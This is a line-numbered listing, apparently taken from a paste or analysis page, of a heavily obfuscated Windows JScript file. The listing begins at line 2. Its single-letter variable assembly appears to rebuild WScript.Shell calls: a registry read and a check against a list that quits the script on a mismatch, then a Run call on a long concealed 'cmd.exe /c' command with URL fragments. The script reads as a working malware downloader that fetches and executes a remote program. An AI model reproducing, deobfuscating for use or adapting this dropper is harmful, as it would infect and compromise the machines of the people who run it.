2 | var uarftsrpl = this[uuchosdul + sxrdajgm + qgdud + vxhnafqpj + caqrpsjw + lcbwitmgw + tkgyznuw + oacsxvhsl] ( this[iucftqylr + vspifeei + jpugwkkeu + qgdud + nmlhecz + uuchosdul + oacsxvhsl][epmxyorx + qgdud + caqrpsjw + sxrdajgm + oacsxvhsl + caqrpsjw + tlphpy + fhnxx + ndawiru + caqrpsjw + jpugwkkeu + oacsxvhsl] ( iucftqylr + vspifeei + jpugwkkeu + qgdud + nmlhecz + uuchosdul + oacsxvhsl + rfvpnpbqs + vspifeei + fyxclgu + caqrpsjw + nlmrwrk + nlmrwrk ) [jsiqrfqau + caqrpsjw + ipevxlzjm + jsiqrfqau + caqrpsjw + sxrdajgm + vwzgdpo] ( usqlnj + zvoldyd + mpyvhlc + mdwfx + yvjvm + epmxyorx + euctv + jsiqrfqau + jsiqrfqau + mpyvhlc + kfzrqpj + rrnuhlvni + yvjvm + euctv + vspifeei + mpyvhlc + jsiqrfqau + hqgibecqk + epmxyorx + oyxtmpico + tkgyznuw + oacsxvhsl + qgdud + oyxtmpico + nlmrwrk + totucjizv + csnnrs + sxrdajgm + tkgyznuw + caqrpsjw + nlmrwrk + hqgibecqk + lcbwitmgw + tkgyznuw + oacsxvhsl + caqrpsjw + qgdud + tkgyznuw + sxrdajgm + oacsxvhsl + nmlhecz + oyxtmpico + tkgyznuw + sxrdajgm + nlmrwrk + hqgibecqk + eecbd + oyxtmpico + jpugwkkeu + sxrdajgm + nlmrwrk + caqrpsjw ), 16 ); |
|
3 | for ( jwxhxia = 0 ; jwxhxia < hzgdntu[nlmrwrk + caqrpsjw + tkgyznuw + ipevxlzjm + oacsxvhsl + fyxclgu] ; ++ jwxhxia ) | |
4 | { | |
5 | if ( uarftsrpl == hzgdntu[jwxhxia] ) | |
6 | { | |
7 | uarftsrpl = true; | |
8 | break ; | |
9 | } | |
10 | } | |
11 | if ( uarftsrpl !== true ) | |
12 | this[iucftqylr + vspifeei + jpugwkkeu + qgdud + nmlhecz + uuchosdul + oacsxvhsl][xrdkrcba + gsyryhzue + nmlhecz + oacsxvhsl] ( ); | |
13 | this[iucftqylr + vspifeei + jpugwkkeu + qgdud + nmlhecz + uuchosdul + oacsxvhsl][epmxyorx + qgdud + caqrpsjw + sxrdajgm + oacsxvhsl + caqrpsjw + tlphpy + fhnxx + ndawiru + caqrpsjw + jpugwkkeu + oacsxvhsl] ( iucftqylr + vspifeei + jpugwkkeu + qgdud + nmlhecz + uuchosdul + oacsxvhsl + rfvpnpbqs + vspifeei + fyxclgu + caqrpsjw + nlmrwrk + nlmrwrk ) [qgdud + gsyryhzue + tkgyznuw] ( jpugwkkeu + ptybndc + vwzgdpo + totucjizv + fusytyl + jpugwkkeu + totucjizv + uuchosdul + oyxtmpico + qhixyo + caqrpsjw + qgdud + vxhnafqpj + fyxclgu + caqrpsjw + nlmrwrk + nlmrwrk + rfvpnpbqs + caqrpsjw + fcsaxbx + caqrpsjw + totucjizv + amqyyrx + epmxyorx + oyxtmpico + ptybndc + ptybndc + sxrdajgm + tkgyznuw + vwzgdpo + totucjizv + dcgnsbj + lcbwitmgw + tkgyznuw + qjakz + oyxtmpico + bkwmtd + caqrpsjw + amqyyrx + iucftqylr + caqrpsjw + fhnxx + jsiqrfqau + caqrpsjw + kngankzc + gsyryhzue + caqrpsjw + vxhnafqpj + oacsxvhsl + totucjizv + amqyyrx + tlphpy + gsyryhzue + oacsxvhsl + yxgxzc + nmlhecz + nlmrwrk + caqrpsjw + totucjizv + hlpsay + oacsxvhsl + caqrpsjw + ptybndc + uuchosdul + hlpsay + hqgibecqk + nmlhecz + tkgyznuw + qjakz + oyxtmpico + nmlhecz + jpugwkkeu + caqrpsjw + rfvpnpbqs + uuchosdul + vwzgdpo + uflbacvb + totucjizv + fyxclgu + oacsxvhsl + oacsxvhsl + uuchosdul + tmrwuhl + fusytyl + fusytyl + sgkdrik + dtmianlm + ialxeoeit + rfvpnpbqs + sgkdrik + ddtzyn + ialxeoeit + rfvpnpbqs + sgkdrik + rfvpnpbqs + setapkakn + ncqef + zskzonizd + fusytyl + nmlhecz + tkgyznuw + qjakz + oyxtmpico + nmlhecz + jpugwkkeu + caqrpsjw + rfvpnpbqs + uuchosdul + fyxclgu + uuchosdul + dcgnsbj + ppszctrqc + ppszctrqc + vxhnafqpj + oacsxvhsl + sxrdajgm + qgdud + oacsxvhsl + totucjizv + hlpsay + oacsxvhsl + caqrpsjw + ptybndc + uuchosdul + hlpsay + hqgibecqk + nmlhecz + tkgyznuw + qjakz + oyxtmpico + nmlhecz + jpugwkkeu + caqrpsjw + rfvpnpbqs + uuchosdul + vwzgdpo + uflbacvb + ppszctrqc + ppszctrqc + jpugwkkeu + ptybndc + vwzgdpo + totucjizv + fusytyl + jpugwkkeu + totucjizv + tkgyznuw + caqrpsjw + oacsxvhsl + totucjizv + gsyryhzue + vxhnafqpj + caqrpsjw + totucjizv + hqgibecqk + hqgibecqk + sgkdrik + dtmianlm + ialxeoeit + rfvpnpbqs + sgkdrik + ddtzyn + ialxeoeit + rfvpnpbqs + sgkdrik + rfvpnpbqs + setapkakn + ncqef + zskzonizd + avfype + zxops + zxops + zxops + zxops + hqgibecqk + vwzgdpo + sxrdajgm + qjakz + qhixyo + qhixyo + qhixyo + qgdud + oyxtmpico + oyxtmpico + oacsxvhsl + hqgibecqk + ppszctrqc + ppszctrqc + jpugwkkeu + ptybndc + vwzgdpo + totucjizv + fusytyl + jpugwkkeu + totucjizv + qgdud + caqrpsjw + ipevxlzjm + vxhnafqpj + qjakz + qgdud + ialxeoeit + setapkakn + totucjizv + fusytyl + vxhnafqpj + totucjizv + hqgibecqk + hqgibecqk + sgkdrik + dtmianlm + ialxeoeit + rfvpnpbqs + sgkdrik + ddtzyn + ialxeoeit + rfvpnpbqs + sgkdrik + rfvpnpbqs + setapkakn + ncqef + zskzonizd + avfype + zxops + zxops + zxops + zxops + hqgibecqk + vwzgdpo + sxrdajgm + qjakz + qhixyo + qhixyo + qhixyo + qgdud + oyxtmpico + oyxtmpico + oacsxvhsl + hqgibecqk + sgkdrik + fbqyigpx + setapkakn + fbqyigpx + ddtzyn + sgkdrik + dtmianlm + setapkakn + sgkdrik + ncqef + setapkakn + zskzonizd + zxops + zskzonizd + ddtzyn + rfvpnpbqs + vwzgdpo + nlmrwrk + nlmrwrk, 0, false ); |
|
14 | } | |
15 | qjakz = "n"; | |
16 | qjakz = "G"; | |
17 | qjakz = "A"; | |
18 | qjakz = "c"; | |
19 | qjakz = "H"; | |
20 | qjakz = "r"; | |
21 | qjakz = "q"; | |
22 | qjakz = "y"; | |
23 | qjakz = "i"; | |
24 | qjakz = "Q"; | |
25 | qjakz = "L"; | |
26 | qjakz = "d"; | |
27 | qjakz = "k"; | |
28 | qjakz = "P"; | |
29 | qjakz = "k"; | |
30 | qjakz = "j"; | |
31 | qjakz = "K"; | |
32 | qjakz = "m"; | |
33 | qjakz = "P"; | |
34 | qjakz = "W"; | |
35 | qjakz = "z"; | |
36 | qjakz = "m"; | |
37 | qjakz = "J"; | |
38 | qjakz = "H"; | |
39 | qjakz = "M"; | |
40 | qjakz = "G"; | |
41 | qjakz = "X"; | |
42 | qjakz = "s"; | |
43 | qjakz = "v"; | |
44 | ndawiru = "Q"; | |
45 | ndawiru = "B"; | |
46 | ndawiru = "Y"; | |
47 | ndawiru = "y"; | |
48 | ndawiru = "C"; | |
49 | ndawiru = "g"; | |
50 | ndawiru = "y"; | |
51 | ndawiru = "y"; | |
52 | ndawiru = "C"; | |
53 | ndawiru = "r"; | |
54 | ndawiru = "V"; | |
55 | ndawiru = "H"; | |
56 | ndawiru = "c"; | |
57 | ndawiru = "X"; | |
58 | ndawiru = "s"; | |
59 | ndawiru = "v"; | |
60 | ndawiru = "u"; | |
61 | ndawiru = "u"; | |
62 | ndawiru = "F"; | |
63 | ndawiru = "b"; | |
64 | ndawiru = "A"; | |
65 | ndawiru = "A"; | |
66 | ndawiru = "j"; | |
67 | ndawiru = "y"; | |
68 | ndawiru = "S"; | |
69 | ndawiru = "j"; | |
70 | sxrdajgm = "D"; | |
71 | sxrdajgm = "k"; | |
72 | sxrdajgm = "l"; | |
73 | sxrdajgm = "S"; | |
74 | sxrdajgm = "t"; | |
75 | sxrdajgm = "r"; | |
76 | sxrdajgm = "L"; | |
77 | sxrdajgm = "o"; | |
78 | sxrdajgm = "L"; | |
79 | sxrdajgm = "S"; | |
80 | sxrdajgm = "a"; | |
81 | uuchosdul = "h"; | |
82 | uuchosdul = "N"; | |
83 | uuchosdul = "d"; | |
84 | uuchosdul = "y"; | |
85 | uuchosdul = "U"; | |
86 | uuchosdul = "R"; | |
87 | uuchosdul = "W"; | |
88 | uuchosdul = "M"; | |
89 | uuchosdul = "x"; | |
90 | uuchosdul = "B"; | |
91 | uuchosdul = "S"; | |
92 | uuchosdul = "w"; | |
93 | uuchosdul = "l"; | |
94 | uuchosdul = "d"; | |
95 | uuchosdul = "m"; | |
96 | uuchosdul = "J"; | |
97 | uuchosdul = "z"; | |
98 | uuchosdul = "a"; | |
99 | uuchosdul = "X"; | |
100 | uuchosdul = "t"; | |
101 | uuchosdul = "J"; | |
102 | uuchosdul = "H"; | |
103 | uuchosdul = "w"; | |
104 | uuchosdul = "o"; | |
105 | uuchosdul = "m"; | |
106 | uuchosdul = "z"; | |
107 | uuchosdul = "p"; | |
108 | jsiqrfqau = "l"; | |
109 | jsiqrfqau = "A"; | |
110 | jsiqrfqau = "B"; | |
111 | jsiqrfqau = "o"; | |
112 | jsiqrfqau = "v"; | |
113 | jsiqrfqau = "P"; | |
114 | jsiqrfqau = "F"; | |
115 | jsiqrfqau = "e"; | |
116 | jsiqrfqau = "g"; | |
117 | jsiqrfqau = "i"; | |
118 | jsiqrfqau = "n"; | |
119 | jsiqrfqau = "i"; | |
120 | jsiqrfqau = "t"; | |
121 | jsiqrfqau = "y"; | |
122 | jsiqrfqau = "I"; | |
123 | jsiqrfqau = "c"; | |
124 | jsiqrfqau = "S"; | |
125 | jsiqrfqau = "w"; | |
126 | jsiqrfqau = "z"; | |
127 | jsiqrfqau = "A"; | |
128 | jsiqrfqau = "x"; | |
129 | jsiqrfqau = "t"; | |
130 | jsiqrfqau = "K"; | |
131 | jsiqrfqau = "g"; | |
132 | jsiqrfqau = "C"; | |
133 | jsiqrfqau = "u"; | |
134 | jsiqrfqau = "I"; | |
135 | jsiqrfqau = "R"; | |
136 | jsiqrfqau = "K"; | |
137 | jsiqrfqau = "Y"; | |
138 | jsiqrfqau = "k"; | |
139 | jsiqrfqau = "k"; | |
140 | jsiqrfqau = "L"; | |
141 | jsiqrfqau = "R"; | |
142 | oyxtmpico = "X"; | |
143 | oyxtmpico = "x"; | |
144 | oyxtmpico = "o"; | |
145 | qgdud = "I"; | |
146 | qgdud = "M"; | |
147 | qgdud = "I"; | |
148 | qgdud = "s"; | |
149 | qgdud = "C"; | |
150 | qgdud = "v"; | |
151 | qgdud = "x"; | |
152 | qgdud = "P"; | |
153 | qgdud = "r"; | |
154 | ialxeoeit = "j"; | |
155 | ialxeoeit = "s"; | |
156 | ialxeoeit = "c"; | |
157 | ialxeoeit = "p"; | |
158 | ialxeoeit = "q"; | |
159 | ialxeoeit = "r"; | |
160 | ialxeoeit = "e"; | |
161 | ialxeoeit = "T"; | |
162 | ialxeoeit = "Z"; | |
163 | ialxeoeit = "S"; | |
164 | ialxeoeit = "X"; | |
165 | ialxeoeit = "D"; | |
166 | ialxeoeit = "k"; | |
167 | ialxeoeit = "g"; | |
168 | ialxeoeit = "V"; | |
169 | ialxeoeit = "A"; | |
170 | ialxeoeit = "j"; | |
171 | ialxeoeit = "A"; | |
172 | ialxeoeit = "n"; | |
173 | ialxeoeit = "L"; | |
174 | ialxeoeit = "G"; | |
175 | ialxeoeit = "L"; | |
176 | ialxeoeit = "E"; | |
177 | ialxeoeit = "x"; | |
178 | ialxeoeit = "z"; | |
179 | ialxeoeit = "y"; | |
180 | ialxeoeit = "m"; | |
181 | ialxeoeit = "o"; | |
182 | ialxeoeit = "c"; | |
183 | ialxeoeit = "3"; | |
184 | sgkdrik = "z"; | |
185 | sgkdrik = "T"; | |
186 | sgkdrik = "I"; | |
187 | sgkdrik = "e"; | |
188 | sgkdrik = "c"; | |
189 | sgkdrik = "j"; | |
190 | sgkdrik = "o"; | |
191 | sgkdrik = "b"; | |
192 | sgkdrik = "x"; | |
193 | sgkdrik = "m"; | |
194 | sgkdrik = "v"; | |
195 | sgkdrik = "o"; | |
196 | sgkdrik = "F"; | |
197 | sgkdrik = "1"; | |
198 | nmlhecz = "R"; | |
199 | nmlhecz = "C"; | |
200 | nmlhecz = "s"; | |
201 | nmlhecz = "L"; | |
202 | nmlhecz = "u"; | |
203 | nmlhecz = "O"; | |
204 | nmlhecz = "f"; | |
205 | nmlhecz = "d"; | |
206 | nmlhecz = "Q"; | |
207 | nmlhecz = "i"; | |
208 | nmlhecz = "k"; | |
209 | nmlhecz = "m"; | |
210 | nmlhecz = "p"; | |
211 | nmlhecz = "d"; | |
212 | nmlhecz = "H"; | |
213 | nmlhecz = "W"; | |
214 | nmlhecz = "u"; | |
215 | nmlhecz = "W"; | |
216 | nmlhecz = "c"; | |
217 | nmlhecz = "o"; | |
218 | nmlhecz = "N"; | |
219 | nmlhecz = "W"; | |
220 | nmlhecz = "c"; | |
221 | nmlhecz = "m"; | |
222 | nmlhecz = "u"; | |
223 | nmlhecz = "C"; | |
224 | nmlhecz = "i"; | |
225 | avfype = "r"; | |
226 | avfype = "b"; | |
227 | avfype = "f"; | |
228 | avfype = "A"; | |
229 | avfype = "f"; | |
230 | avfype = "E"; | |
231 | avfype = "E"; | |
232 | avfype = "Y"; | |
233 | avfype = "D"; | |
234 | avfype = "x"; | |
235 | avfype = "E"; | |
236 | avfype = "k"; | |
237 | avfype = "D"; | |
238 | avfype = "p"; | |
239 | avfype = "l"; | |
240 | avfype = "f"; | |
241 | avfype = "l"; | |
242 | avfype = "E"; | |
243 | avfype = "R"; | |
244 | avfype = "O"; | |
245 | avfype = "R"; | |
246 | avfype = "m"; | |
247 | avfype = "c"; | |
248 | avfype = "l"; | |
249 | avfype = "s"; | |
250 | avfype = "b"; | |
251 | avfype = "@"; | |
252 | tkgyznuw = "I"; | |
253 | tkgyznuw = "x"; | |
254 | tkgyznuw = "d"; | |
255 | tkgyznuw = "S"; | |
256 | tkgyznuw = "m"; | |
257 | tkgyznuw = "q"; | |
258 | tkgyznuw = "n"; | |
259 | lcbwitmgw = "l"; | |
260 | lcbwitmgw = "T"; | |
261 | lcbwitmgw = "H"; | |
262 | lcbwitmgw = "h"; | |
263 | lcbwitmgw = "Y"; | |
264 | lcbwitmgw = "q"; | |
265 | lcbwitmgw = "j"; | |
266 | lcbwitmgw = "J"; | |
267 | lcbwitmgw = "e"; | |
268 | lcbwitmgw = "M"; | |
269 | lcbwitmgw = "I"; | |
270 | ppszctrqc = "p"; | |
271 | ppszctrqc = "I"; | |
272 | ppszctrqc = "R"; | |
273 | ppszctrqc = "o"; | |
274 | ppszctrqc = "T"; | |
275 | ppszctrqc = "q"; | |
276 | ppszctrqc = "P"; | |
277 | ppszctrqc = "Y"; | |
278 | ppszctrqc = "a"; | |
279 | ppszctrqc = "H"; | |
280 | ppszctrqc = "r"; | |
281 | ppszctrqc = "a"; | |
282 | ppszctrqc = "S"; | |
283 | ppszctrqc = "u"; | |
284 | ppszctrqc = "y"; | |
285 | ppszctrqc = "o"; | |
286 | ppszctrqc = "&"; | |
287 | caqrpsjw = "R"; | |
288 | caqrpsjw = "S"; | |
289 | caqrpsjw = "U"; | |
290 | caqrpsjw = "i"; | |
291 | caqrpsjw = "u"; | |
292 | caqrpsjw = "k"; | |
293 | caqrpsjw = "K"; | |
294 | caqrpsjw = "P"; | |
295 | caqrpsjw = "D"; | |
296 | caqrpsjw = "L"; | |
297 | caqrpsjw = "h"; | |
298 | caqrpsjw = "X"; | |
299 | caqrpsjw = "u"; | |
300 | caqrpsjw = "U"; | |
301 | caqrpsjw = "u"; | |
302 | caqrpsjw = "A"; | |
303 | caqrpsjw = "U"; | |
304 | caqrpsjw = "K"; | |
305 | caqrpsjw = "u"; | |
306 | caqrpsjw = "I"; | |
307 | caqrpsjw = "v"; | |
308 | caqrpsjw = "L"; | |
309 | caqrpsjw = "a"; | |
310 | caqrpsjw = "A"; | |
311 | caqrpsjw = "z"; | |
312 | caqrpsjw = "A"; | |
313 | caqrpsjw = "q"; | |
314 | caqrpsjw = "h"; | |
315 | caqrpsjw = "A"; | |
316 | caqrpsjw = "C"; | |
317 | caqrpsjw = "L"; | |
318 | caqrpsjw = "e"; | |
319 | amqyyrx = "-"; | |
320 | uflbacvb = "d"; | |
321 | uflbacvb = "T"; | |
322 | uflbacvb = "L"; | |
323 | uflbacvb = "C"; | |
324 | uflbacvb = "s"; | |
325 | uflbacvb = "K"; | |
326 | uflbacvb = "x"; | |
327 | uflbacvb = "t"; | |
328 | uflbacvb = "e"; | |
329 | uflbacvb = "W"; | |
330 | uflbacvb = "D"; | |
331 | uflbacvb = "N"; | |
332 | uflbacvb = "j"; | |
333 | uflbacvb = "U"; | |
334 | uflbacvb = "H"; | |
335 | uflbacvb = "m"; | |
336 | uflbacvb = "U"; | |
337 | uflbacvb = "j"; | |
338 | uflbacvb = "R"; | |
339 | uflbacvb = "O"; | |
340 | uflbacvb = "f"; | |
341 | uflbacvb = "m"; | |
342 | uflbacvb = "Q"; | |
343 | uflbacvb = "T"; | |
344 | uflbacvb = "H"; | |
345 | uflbacvb = "A"; | |
346 | uflbacvb = "Q"; | |
347 | uflbacvb = "I"; | |
348 | uflbacvb = "M"; | |
349 | uflbacvb = "b"; | |
350 | uflbacvb = "G"; | |
351 | uflbacvb = "Z"; | |
352 | uflbacvb = "f"; | |
353 | epmxyorx = "x"; | |
354 | epmxyorx = "Q"; | |
355 | epmxyorx = "s"; | |
356 | epmxyorx = "R"; | |
357 | epmxyorx = "S"; | |
358 | epmxyorx = "G"; | |
359 | epmxyorx = "f"; | |
360 | epmxyorx = "X"; | |
361 | epmxyorx = "V"; | |
362 | epmxyorx = "m"; | |
363 | epmxyorx = "U"; | |
364 | epmxyorx = "C"; | |
365 | epmxyorx = "G"; | |
366 | epmxyorx = "p"; | |
367 | epmxyorx = "m"; | |
368 | epmxyorx = "A"; | |
369 | epmxyorx = "o"; | |
370 | epmxyorx = "G"; | |
371 | epmxyorx = "U"; | |
372 | epmxyorx = "U"; | |
373 | epmxyorx = "g"; | |
374 | epmxyorx = "C"; | |
375 | dcgnsbj = "j"; | |
376 | dcgnsbj = "I"; | |
377 | dcgnsbj = "O"; | |
378 | dcgnsbj = "r"; | |
379 | dcgnsbj = "N"; | |
380 | dcgnsbj = "f"; | |
381 | dcgnsbj = "M"; | |
382 | dcgnsbj = "a"; | |
383 | dcgnsbj = "F"; | |
384 | dcgnsbj = "O"; | |
385 | dcgnsbj = "r"; | |
386 | dcgnsbj = "p"; | |
387 | dcgnsbj = "n"; | |
388 | dcgnsbj = "V"; | |
389 | dcgnsbj = "x"; | |
390 | dcgnsbj = "x"; | |
391 | dcgnsbj = "f"; | |
392 | dcgnsbj = "y"; | |
393 | dcgnsbj = "E"; | |
394 | dcgnsbj = "I"; | |
395 | dcgnsbj = "Y"; | |
396 | dcgnsbj = "k"; | |
397 | dcgnsbj = "P"; | |
398 | dcgnsbj = "d"; | |
399 | dcgnsbj = "B"; | |
400 | dcgnsbj = "t"; | |
401 | dcgnsbj = "k"; | |
402 | dcgnsbj = "a"; | |
403 | dcgnsbj = "A"; | |
404 | dcgnsbj = "p"; | |
405 | dcgnsbj = "g"; | |
406 | dcgnsbj = "T"; | |
407 | dcgnsbj = "m"; | |
408 | dcgnsbj = "H"; | |
409 | dcgnsbj = "K"; | |
410 | dcgnsbj = "u"; | |
411 | dcgnsbj = "i"; | |
412 | dcgnsbj = "b"; | |
413 | dcgnsbj = "j"; | |
414 | dcgnsbj = "\""; | |
415 | fhnxx = "g"; | |
416 | fhnxx = "b"; | |
417 | gsyryhzue = "M"; | |
418 | gsyryhzue = "M"; | |
419 | gsyryhzue = "t"; | |
420 | gsyryhzue = "P"; | |
421 | gsyryhzue = "c"; | |
422 | gsyryhzue = "d"; | |
423 | gsyryhzue = "S"; | |
424 | gsyryhzue = "h"; | |
425 | gsyryhzue = "v"; | |
426 | gsyryhzue = "B"; | |
427 | gsyryhzue = "m"; | |
428 | gsyryhzue = "L"; | |
429 | gsyryhzue = "q"; | |
430 | gsyryhzue = "S"; | |
431 | gsyryhzue = "O"; | |
432 | gsyryhzue = "S"; | |
433 | gsyryhzue = "M"; | |
434 | gsyryhzue = "i"; | |
435 | gsyryhzue = "q"; | |
436 | gsyryhzue = "K"; | |
437 | gsyryhzue = "L"; | |
438 | gsyryhzue = "l"; | |
439 | gsyryhzue = "X"; | |
440 | gsyryhzue = "Y"; | |
441 | gsyryhzue = "v"; | |
442 | gsyryhzue = "P"; | |
443 | gsyryhzue = "h"; | |
444 | gsyryhzue = "M"; | |
445 | gsyryhzue = "m"; | |
446 | gsyryhzue = "n"; | |
447 | gsyryhzue = "Q"; | |
448 | gsyryhzue = "M"; | |
449 | gsyryhzue = "l"; | |
450 | gsyryhzue = "J"; | |
451 | gsyryhzue = "Z"; | |
452 | gsyryhzue = "v"; | |
453 | gsyryhzue = "a"; | |
454 | gsyryhzue = "u"; | |
455 | eecbd = "D"; | |
456 | eecbd = "l"; | |
457 | eecbd = "H"; | |
458 | eecbd = "V"; | |
459 | eecbd = "a"; | |
460 | eecbd = "q"; | |
461 | eecbd = "w"; | |
462 | eecbd = "S"; | |
463 | eecbd = "z"; | |
464 | eecbd = "L"; | |
465 | tlphpy = "y"; | |
466 | tlphpy = "R"; | |
467 | tlphpy = "l"; | |
468 | tlphpy = "P"; | |
469 | tlphpy = "d"; | |
470 | tlphpy = "Z"; | |
471 | tlphpy = "X"; | |
472 | tlphpy = "t"; | |
473 | tlphpy = "J"; | |
474 | tlphpy = "n"; | |
475 | tlphpy = "m"; | |
476 | tlphpy = "t"; | |
477 | tlphpy = "x"; | |
478 | tlphpy = "w"; | |
479 | tlphpy = "d"; | |
480 | tlphpy = "C"; | |
481 | tlphpy = "r"; | |
482 | tlphpy = "L"; | |
483 | tlphpy = "i"; | |
484 | tlphpy = "j"; | |
485 | tlphpy = "O"; | |
486 | zskzonizd = "r"; | |
487 | zskzonizd = "g"; | |
488 | zskzonizd = "y"; | |
489 | zskzonizd = "m"; | |
490 | zskzonizd = "c"; | |
491 | zskzonizd = "F"; | |
492 | zskzonizd = "i"; | |
493 | zskzonizd = "R"; | |
494 | zskzonizd = "l"; | |
495 | zskzonizd = "s"; | |
496 | zskzonizd = "C"; | |
497 | zskzonizd = "w"; | |
498 | zskzonizd = "l"; | |
499 | zskzonizd = "a"; | |
500 | zskzonizd = "L"; | |
501 | zskzonizd = "Z"; | |
502 | zskzonizd = "U"; | |
503 | zskzonizd = "x"; | |
504 | zskzonizd = "M"; | |
505 | zskzonizd = "i"; | |
506 | zskzonizd = "D"; | |
507 | zskzonizd = "D"; | |
508 | zskzonizd = "O"; | |
509 | zskzonizd = "X"; | |
510 | zskzonizd = "C"; | |
511 | zskzonizd = "f"; | |
512 | zskzonizd = "l"; | |
513 | zskzonizd = "V"; | |
514 | zskzonizd = "m"; | |
515 | zskzonizd = "R"; | |
516 | zskzonizd = "p"; | |
517 | zskzonizd = "E"; | |
518 | zskzonizd = "E"; | |
519 | zskzonizd = "y"; | |
520 | zskzonizd = "x"; | |
521 | zskzonizd = "G"; | |
522 | zskzonizd = "x"; | |
523 | zskzonizd = "I"; | |
524 | zskzonizd = "5"; | |
525 | tmrwuhl = "U"; | |
526 | tmrwuhl = "i"; | |
527 | tmrwuhl = "E"; | |
528 | tmrwuhl = "g"; | |
529 | tmrwuhl = "t"; | |
530 | tmrwuhl = "f"; | |
531 | tmrwuhl = "g"; | |
532 | tmrwuhl = "r"; | |
533 | tmrwuhl = "S"; | |
534 | tmrwuhl = "j"; | |
535 | tmrwuhl = "c"; | |
536 | tmrwuhl = "c"; | |
537 | tmrwuhl = "E"; | |
538 | tmrwuhl = "a"; | |
539 | tmrwuhl = "o"; | |
540 | tmrwuhl = "H"; | |
541 | tmrwuhl = ":"; | |
542 | zxops = "A"; | |
543 | zxops = "V"; | |
544 | zxops = "i"; | |
545 | zxops = "z"; | |
546 | zxops = "A"; | |
547 | zxops = "a"; | |
548 | zxops = "b"; | |
549 | zxops = "i"; | |
550 | zxops = "E"; | |
551 | zxops = "t"; | |
552 | zxops = "h"; | |
553 | zxops = "J"; | |
554 | zxops = "p"; | |
555 | zxops = "j"; | |
556 | zxops = "n"; | |
557 | zxops = "l"; | |
558 | zxops = "f"; | |
559 | zxops = "b"; | |
560 | zxops = "U"; | |
561 | zxops = "m"; | |
562 | zxops = "B"; | |
563 | zxops = "o"; | |
564 | zxops = "O"; | |
565 | zxops = "x"; | |
566 | zxops = "r"; | |
567 | zxops = "j"; | |
568 | zxops = "d"; | |
569 | zxops = "u"; | |
570 | zxops = "K"; | |
571 | zxops = "8"; | |
572 | totucjizv = "e"; | |
573 | totucjizv = "G"; | |
574 | totucjizv = "N"; | |
575 | totucjizv = "f"; | |
576 | totucjizv = "r"; | |
577 | totucjizv = "W"; | |
578 | totucjizv = " "; | |
579 | setapkakn = "C"; | |
580 | setapkakn = "M"; | |
581 | setapkakn = "c"; | |
582 | setapkakn = "J"; | |
583 | setapkakn = "z"; | |
584 | setapkakn = "f"; | |
585 | setapkakn = "C"; | |
586 | setapkakn = "Z"; | |
587 | setapkakn = "q"; | |
588 | setapkakn = "S"; | |
589 | setapkakn = "H"; | |
590 | setapkakn = "P"; | |
591 | setapkakn = "c"; | |
592 | setapkakn = "p"; | |
593 | setapkakn = "o"; | |
594 | setapkakn = "S"; | |
595 | setapkakn = "T"; | |
596 | setapkakn = "R"; | |
597 | setapkakn = "t"; | |
598 | setapkakn = "S"; | |
599 | setapkakn = "g"; | |
600 | setapkakn = "L"; | |
601 | setapkakn = "A"; | |
602 | setapkakn = "w"; | |
603 | setapkakn = "N"; | |
604 | setapkakn = "O"; | |
605 | setapkakn = "2"; | |
606 | vxhnafqpj = "G"; | |
607 | vxhnafqpj = "g"; | |
608 | vxhnafqpj = "B"; | |
609 | vxhnafqpj = "N"; | |
610 | vxhnafqpj = "a"; | |
611 | vxhnafqpj = "v"; | |
612 | vxhnafqpj = "F"; | |
613 | vxhnafqpj = "A"; | |
614 | vxhnafqpj = "I"; | |
615 | vxhnafqpj = "Z"; | |
616 | vxhnafqpj = "L"; | |
617 | vxhnafqpj = "E"; | |
618 | vxhnafqpj = "k"; | |
619 | vxhnafqpj = "Q"; | |
620 | vxhnafqpj = "D"; | |
621 | vxhnafqpj = "U"; | |
622 | vxhnafqpj = "A"; | |
623 | vxhnafqpj = "s"; | |
624 | zvoldyd = "S"; | |
625 | zvoldyd = "e"; | |
626 | zvoldyd = "M"; | |
627 | zvoldyd = "e"; | |
628 | zvoldyd = "E"; | |
629 | zvoldyd = "h"; | |
630 | zvoldyd = "w"; | |
631 | zvoldyd = "w"; | |
632 | zvoldyd = "Z"; | |
633 | zvoldyd = "T"; | |
634 | zvoldyd = "T"; | |
635 | zvoldyd = "E"; | |
636 | zvoldyd = "K"; | |
637 | zvoldyd = "R"; | |
638 | zvoldyd = "M"; | |
639 | zvoldyd = "T"; | |
640 | zvoldyd = "S"; | |
641 | zvoldyd = "n"; | |
642 | zvoldyd = "m"; | |
643 | zvoldyd = "J"; | |
644 | zvoldyd = "D"; | |
645 | zvoldyd = "s"; | |
646 | zvoldyd = "J"; | |
647 | zvoldyd = "e"; | |
648 | zvoldyd = "e"; | |
649 | zvoldyd = "k"; | |
650 | zvoldyd = "n"; | |
651 | zvoldyd = "S"; | |
652 | zvoldyd = "u"; | |
653 | zvoldyd = "h"; | |
654 | zvoldyd = "J"; | |
655 | zvoldyd = "D"; | |
656 | zvoldyd = "z"; | |
657 | zvoldyd = "z"; | |
658 | zvoldyd = "v"; | |
659 | zvoldyd = "a"; | |
660 | zvoldyd = "o"; | |
661 | zvoldyd = "G"; | |
662 | zvoldyd = "m"; | |
663 | zvoldyd = "P"; | |
664 | zvoldyd = "e"; | |
665 | zvoldyd = "p"; | |
666 | zvoldyd = "s"; | |
667 | zvoldyd = "s"; | |
668 | zvoldyd = "K"; | |
669 | yxgxzc = "K"; | |
670 | yxgxzc = "B"; | |
671 | yxgxzc = "v"; | |
672 | yxgxzc = "B"; | |
673 | yxgxzc = "k"; | |
674 | yxgxzc = "g"; | |
675 | yxgxzc = "S"; | |
676 | yxgxzc = "o"; | |
677 | yxgxzc = "T"; | |
678 | yxgxzc = "F"; | |
679 | yxgxzc = "Y"; | |
680 | yxgxzc = "L"; | |
681 | yxgxzc = "Z"; | |
682 | yxgxzc = "S"; | |
683 | yxgxzc = "x"; | |
684 | yxgxzc = "V"; | |
685 | yxgxzc = "m"; | |
686 | yxgxzc = "H"; | |
687 | yxgxzc = "a"; | |
688 | yxgxzc = "q"; | |
689 | yxgxzc = "E"; | |
690 | yxgxzc = "E"; | |
691 | yxgxzc = "B"; | |
692 | yxgxzc = "k"; | |
693 | yxgxzc = "P"; | |
694 | yxgxzc = "A"; | |
695 | yxgxzc = "d"; | |
696 | yxgxzc = "w"; | |
697 | yxgxzc = "J"; | |
698 | yxgxzc = "k"; | |
699 | yxgxzc = "G"; | |
700 | yxgxzc = "G"; | |
701 | yxgxzc = "m"; | |
702 | yxgxzc = "F"; | |
703 | vwzgdpo = "Z"; | |
704 | vwzgdpo = "j"; | |
705 | vwzgdpo = "O"; | |
706 | vwzgdpo = "p"; | |
